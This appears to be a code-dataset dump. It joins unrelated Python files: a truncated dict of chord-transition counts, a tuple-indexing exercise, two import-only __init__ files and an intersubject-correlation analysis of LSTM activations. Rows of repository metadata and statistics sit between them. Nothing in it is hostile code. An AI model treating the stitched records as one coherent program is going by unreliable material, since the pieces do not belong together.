'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 3,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 2,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 2,
'GMinor': 3,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'CsDim': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 2,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 2,
'A7': 3,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 3,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 2,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 0,
},
'DsDim': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 3,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 0,
'C7': 0,
'GsMinor': 1,
'Bm7': 2,
'G7': 0,
'Asm7': 0,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 3,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 2,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'EMaj7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 3,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 1,
'E7': 3,
'C7': 1,
'GsMinor': 3,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 3,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 4,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 3,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 1,
},
'FsMaj7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 0,
'Em7': 0,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 3,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 3,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 2,
'Gm7': 2,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 0,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 4,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 3,
'Am7': 0,
'DsMinor': 2,
},
'BMinor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 0,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 3,
'G7': 2,
'Asm7': 0,
'BMajor': 2,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 1,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 3,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 1,
},
'CMaj7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 3,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 3,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 1,
'E7': 2,
'C7': 3,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 2,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 4,
'AsMaj7': 0,
'D7': 1,
'Csm7': 2,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'AsMaj7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 3,
'FMajor': 2,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 2,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 3,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 3,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 2,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 4,
'D7': 2,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'D7': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 2,
'FMajor': 2,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 3,
'G7': 1,
'Asm7': 0,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 3,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 1,
'F7': 2,
'FMaj7': 2,
'FsDim': 3,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 4,
'Csm7': 0,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 1,
},
'Csm7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 0,
'CsMinor': 3,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 2,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 1,
'DsMajor': 0,
'E7': 3,
'C7': 1,
'GsMinor': 2,
'Bm7': 1,
'G7': 1,
'Asm7': 2,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 3,
'Gm7': 0,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 3,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 3,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 4,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 0,
},
'FsMajor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 0,
'Em7': 0,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 0,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 3,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 3,
'Am7': 0,
'DsMinor': 2,
},
'Am7': {
'AMinor': 3,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 3,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 2,
'A7': 3,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 3,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 0,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 0,
'F7': 2,
'FMaj7': 3,
'FsDim': 2,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 3,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 0,
'Am7': 4,
'DsMinor': 0,
},
'DsMinor': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 3,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 3,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 2,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 1,
'BMajor': 2,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 1,
'Csm7': 0,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 3,
},
}
| 27.250836 | 300 | 0.31618 | 26,758 | 211,848 | 2.503065 | 0.006989 | 0.007376 | 0.004897 | 0.003359 | 0.87972 | 0.854039 | 0.830987 | 0.787449 | 0.774564 | 0.718142 | 0 | 0.058395 | 0.30554 | 211,848 | 7,773 | 301 | 27.254342 | 0.39686 | 0.000656 | 0 | 0.874392 | 0 | 0 | 0.296291 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.000131 | 0.000131 | 0 | 0.000131 | 0.000131 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9ee4c159f374d576e74fe0988359e134f3b2b15f | 1,291 | py | Python | week-03/05-tuples-and-lists/ex-01-tuples-syntax/program.py | jersson/mit-intro-cs-python | 4c6232209ed47afcea2fb153ff7fc4aedbd21d52 | [
"MIT"
] | null | null | null | week-03/05-tuples-and-lists/ex-01-tuples-syntax/program.py | jersson/mit-intro-cs-python | 4c6232209ed47afcea2fb153ff7fc4aedbd21d52 | [
"MIT"
] | null | null | null | week-03/05-tuples-and-lists/ex-01-tuples-syntax/program.py | jersson/mit-intro-cs-python | 4c6232209ed47afcea2fb153ff7fc4aedbd21d52 | [
"MIT"
] | null | null | null | x = (1, 2, (3, 'John', 4), 'Hi')
eval = x[0]
print(('x[0]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[2]
print(('x[2]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[-1]
print(('x[-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[2][2]
print(('x[2][2]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[2][-1]
print(('x[2][-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[-1][-1]
print(('x[-1][-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
try:
eval = x[-1][2]
print(('x[-1][2]: {0} value: {1}').format(str(type(eval)), str(eval)))
except:
print('x[-1][2]: <nonetype> value: error')
eval = x[0:1]
print(('x[0:1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[0:-1]
print(('x[0:-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = len(x)
print(('len(x): {0} value: {1}').format(str(type(eval)), str(eval)))
eval = 2 in x
print(('2 in x: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = 3 in x
print(('3 in x: {0} value: {1}').format(str(type(eval)), str(eval)))
try:
eval = x[0] = 8
print(('x[0] = 8: {0} value: {1}').format(str(type(eval)), str(eval)))
except:
print('x[0] = 8: <nonetype> value: error')
# a new comment | 26.895833 | 74 | 0.534469 | 241 | 1,291 | 2.863071 | 0.099585 | 0.113043 | 0.131884 | 0.244928 | 0.765217 | 0.765217 | 0.765217 | 0.765217 | 0.765217 | 0.765217 | 0 | 0.064865 | 0.140201 | 1,291 | 48 | 75 | 26.895833 | 0.556757 | 0.01007 | 0 | 0.121212 | 0 | 0 | 0.285043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
733838cfcd20ccc3f6a5d5d73fbceed70a4fce65 | 159 | py | Python | build/lib/vicedtools/gc/__init__.py | gregbreese/vicedtools | 2d32c8ea2437b67b72495e254b71e7f048bd8f9f | [
"Apache-2.0"
] | 2 | 2021-09-23T06:16:49.000Z | 2021-11-02T00:53:22.000Z | build/lib/vicedtools/gc/__init__.py | gregbreese/vicedtools | 2d32c8ea2437b67b72495e254b71e7f048bd8f9f | [
"Apache-2.0"
] | null | null | null | build/lib/vicedtools/gc/__init__.py | gregbreese/vicedtools | 2d32c8ea2437b67b72495e254b71e7f048bd8f9f | [
"Apache-2.0"
] | null | null | null | from vicedtools.gc.format import create_student_details_gc_csv
from vicedtools.gc.upload import upload_student_details, upload_reports, upload_reports_summary
| 53 | 95 | 0.899371 | 23 | 159 | 5.826087 | 0.521739 | 0.208955 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062893 | 159 | 2 | 96 | 79.5 | 0.899329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
733c7bfe501ba3b39ca945cdb02968067248ef28 | 201 | py | Python | docker/dockerfile/genie-parser/docker_app_run/modules/kafka_stream/__init__.py | btr1975/automation-framework | b0ba661cb6bae193bd5c6531c08d9dba55c4099e | [
"MIT"
] | 8 | 2021-06-02T23:08:40.000Z | 2022-02-11T16:50:24.000Z | docker/dockerfile/genie-parser/docker_app_run/modules/kafka_stream/__init__.py | btr1975/automation-framework | b0ba661cb6bae193bd5c6531c08d9dba55c4099e | [
"MIT"
] | null | null | null | docker/dockerfile/genie-parser/docker_app_run/modules/kafka_stream/__init__.py | btr1975/automation-framework | b0ba661cb6bae193bd5c6531c08d9dba55c4099e | [
"MIT"
] | 2 | 2021-09-30T14:46:03.000Z | 2021-11-14T23:47:35.000Z | """
init for the kafka_consumers module
"""
from .consume_requests import consume_requests
from .consume_requests_threaded import consume_requests_threaded
from .consume_results import consume_results
| 28.714286 | 64 | 0.860697 | 26 | 201 | 6.307692 | 0.461538 | 0.365854 | 0.231707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094527 | 201 | 6 | 65 | 33.5 | 0.901099 | 0.174129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b4048e2dd7127c16fc894f221c380c956a8ae5ce | 15,721 | py | Python | cooperative_isc.py | joechen018/social-ctf | 64d5eb7cbb55c5d67326e168bae4c38576c735d8 | [
"Apache-2.0"
] | null | null | null | cooperative_isc.py | joechen018/social-ctf | 64d5eb7cbb55c5d67326e168bae4c38576c735d8 | [
"Apache-2.0"
] | 1 | 2021-04-19T22:54:40.000Z | 2021-04-19T22:54:40.000Z | cooperative_isc.py | joechen018/social-ctf | 64d5eb7cbb55c5d67326e168bae4c38576c735d8 | [
"Apache-2.0"
] | 4 | 2021-01-15T19:01:35.000Z | 2021-09-24T20:18:38.000Z | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from brainiak.isc import isc
from statsmodels.stats.multitest import multipletests
from statistical_tests import bootstrap_test, fisher_mean
from coupling_metrics import lagged_isc
# Load in PCA-reduced LSTMs
k = 100
lstms_pca = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')

# Compute pairwise ISC for every matchup/repeat and save.
n_matchups = 4
n_repeats = 8
n_players = 4
n_pairs = n_players * (n_players - 1) // 2  # 6 unordered player pairs

iscs = np.full((n_matchups, n_repeats, n_pairs, k), np.nan)
for matchup in np.arange(n_matchups):
    for repeat in np.arange(n_repeats):
        # Move the player axis last, as expected by brainiak's isc()
        lstms_rep = np.moveaxis(lstms_pca[matchup, repeat], 0, 2)
        iscs[matchup, repeat] = isc(lstms_rep, pairwise=True)
        # Bug fix: added the missing space so the implicitly concatenated
        # message no longer reads "...ISC formatchup 0 repeat 0".
        print("Finished computing ISC for "
              f"matchup {matchup} repeat {repeat}")

np.save(f'results/iscs_tanh-z_pca-k{k}.npy', iscs)
# Plot cooperative/competitive ISC for top 10 PCs
matchup = 0
n_repeats = 8
pcs = np.arange(10)
sns.set_context('notebook', font_scale=1.2)
fig, axs = plt.subplots(2, 5, figsize=(25, 8))
for pc, ax in zip(pcs, axs.ravel()):
corr = fisher_mean([np.corrcoef(lstms_pca[matchup, r, ..., pc])
for r in np.arange(n_repeats)], axis=0)
sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,
cmap='RdBu_r', xticklabels=False, yticklabels=False,
fmt='.2f', ax=ax)
ax.set_title(f'PC{pc + 1}')
plt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{k}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Difference in cooperative/competitive ISC across PCs
matchup = 0
n_repeats = 8
n_pcs = 100
# Compute differences between cooperative and competitive ISCs
isc_diffs = []
isc_diffs_df = {'difference': [], 'PC': [], 'repeat': []}
for pc in np.arange(n_pcs):
corrs = [np.corrcoef(lstms_pca[matchup, r, ..., pc])
for r in np.arange(n_repeats)]
diffs = [np.mean(c[[0, 3], [1, 2]]) - np.mean(c[0:2, 2:4])
for c in corrs]
isc_pc_diffs = []
for r, diff in enumerate(diffs):
isc_diffs_df['difference'].append(diff)
isc_diffs_df['PC'].append(pc + 1)
isc_diffs_df['repeat'].append(r)
isc_pc_diffs.append(diff)
isc_diffs.append(isc_pc_diffs)
isc_diffs_df = pd.DataFrame(isc_diffs_df)
isc_diffs = np.array(isc_diffs).T
# Bootstrap test for significance of difference
observed, ci, p, distribution = bootstrap_test(isc_diffs,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='two-sided')
# FDR correction of p-values
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
# Plot ISCs for 100 PCs with significance markers
sig_pos = ((fdr_p < .05) & (observed > 0)).nonzero()[0]
sig_neg = ((fdr_p < .05) & (observed < 0)).nonzero()[0]
sns.set_context('notebook', font_scale=1.2)
fig, ax = plt.subplots(figsize=(16, 4))
sns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',
estimator=fisher_mean)
#ax.set_ylim(-.375, .325) # for matchup = 3 (sig y = -.01)
ax.set_ylim(-.3, 1) # for matchup = 0
ax.set_xticks([0, 19, 39, 59, 79, 99])
for sig_pc in sig_pos:
ax.annotate('.', (sig_pc, -.02), color='tab:red', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
for sig_pc in sig_neg:
ax.annotate('.', (sig_pc, -.02), color='tab:blue', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
ax.set_ylabel('cooperative – competitive ISC')
ax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs');
sns.despine()
plt.savefig(f'figures/isc_diff-bars_tanh-z_pca-k{k}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Load in PCA-reduced LSTMs with confounds regressed out
reg = 'com'  # 'pre', 'hud', 'act', or 'com'
lstms_pca_reg = np.load(f'results/lstms_tanh-z_pca-k{k}_reg-{reg}.npy')

# Compute pairwise ISC for every matchup/repeat and save.
n_matchups = 4
n_repeats = 8
n_players = 4
